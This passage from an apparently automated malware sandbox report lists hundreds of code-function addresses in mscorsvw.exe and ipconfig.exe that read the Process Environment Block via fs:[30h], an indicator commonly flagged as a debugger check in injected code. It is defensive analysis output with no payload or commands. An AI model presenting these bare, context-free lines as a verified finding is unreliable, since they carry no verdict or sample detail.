          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057741E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057669A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05712990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0570C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0571A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057A2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057B1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05700050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05700050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0571002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0571002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0571002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0571002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0571002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05767016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05767016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05767016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057B4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057B4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0577B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0577B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0577B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0577B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0577B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0577B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0571F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0571F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0571F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057290AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05763884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05763884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05713B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05713B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056EDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057B8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056EDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056EF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057A131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0570DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05714BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05714BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05714BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057B5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056F1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056F1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0571B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05712397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057A138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0579D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0572927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0579B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0579B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057B8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05774257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057AEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05724A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05724A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056F8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05703A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05712AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05712ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0571FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056FAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056FAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0571D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0571D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0346DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03538B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0346F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0346DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03493B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03493B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0352131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0348DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03471B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03471B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0351D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0352138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03492397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03494BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03494BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03494BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03535BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03469240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03469240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03469240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03469240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0352EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034F4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0351B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0351B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03538A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0352AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0352AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03478A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0346AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0346AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03483A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03465210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03465210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03465210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03465210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03492ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03492AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0347AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0347AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0348B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0348B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0346C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0346B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0346B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03469100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03469100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03469100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03484120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03484120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03484120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03484120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03484120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034F41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0346B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0346B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0346B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0348C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03492990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03480050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03480050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03522073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03531074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03534015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03534015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0347B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0347B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0347B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0347B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034FB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034FB8D0 mov eax, dword ptr fs:[00000030h]
